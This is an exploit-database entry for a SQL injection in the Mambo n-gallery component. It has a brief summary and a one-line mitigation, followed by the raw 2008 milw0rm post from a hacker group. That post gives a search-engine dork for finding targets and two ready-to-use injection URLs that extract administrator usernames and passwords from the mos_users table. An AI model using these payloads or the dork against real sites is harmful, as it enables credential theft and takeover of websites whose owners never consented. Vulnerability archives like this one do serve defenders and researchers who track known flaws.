Mambo Component n-gallery SQL Injection

vendor:

Component n-gallery

by:

AlbaniaN-[H]

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Component n-gallery

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Mambo Component n-gallery SQL Injection

An attacker can exploit a SQL injection vulnerability in Mambo Component n-gallery to gain access to the username and password of the administrator. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'flokkur' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This will allow the attacker to gain access to the username and password of the administrator.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

###########################################
#                                         #
# Mambo Component n-gallery SQL Injection #
#                                         # 
###########################################
#                                         #
##Author : AlbaniaN-[H]                   # 
#                                         #
###Site : http://www.khg-crew.ws          #
#                                         #
####Home Page : http://www.vaalon.org     #
#                                         #
#####Email : valion@khg-crew.ws           #
#                                         #
###########################################
#                                         #
# DORK : allinurl:"com_n-gallery"         #
#                                         #  
###########################################
#                                         #
##############################################################################################################################################################
#            #                                                                                                                                               #
#Exploit 1 : #                                                                                                                                               #
#            #################################################################################################################################################
#                                                                                                                                                            #
# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--                                              #
#                                                                                                                                                            #
##############################################################################################################################################################
#            #                                                                                                                                               #
#Exploit 2 : #                                                                                                                                               #
#            #################################################################################################################################################
#                                                                                                                                                            #
# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* #
#                                                                                                                                                            #
##############################################################################################################################################################
#          Kosova Hackers Group           # 
###########################################
#             AlbaniaN-[H]                #
###########################################
#         Republic of Kosova (K)          # 
###########################################
#      Greetings to: urtan,redc00de       # 
###########################################
#    & all Kosova Hackers Group           # 
###########################################
#&all muslim peoples all over the world :)#
###########################################

# milw0rm.com [2008-06-30]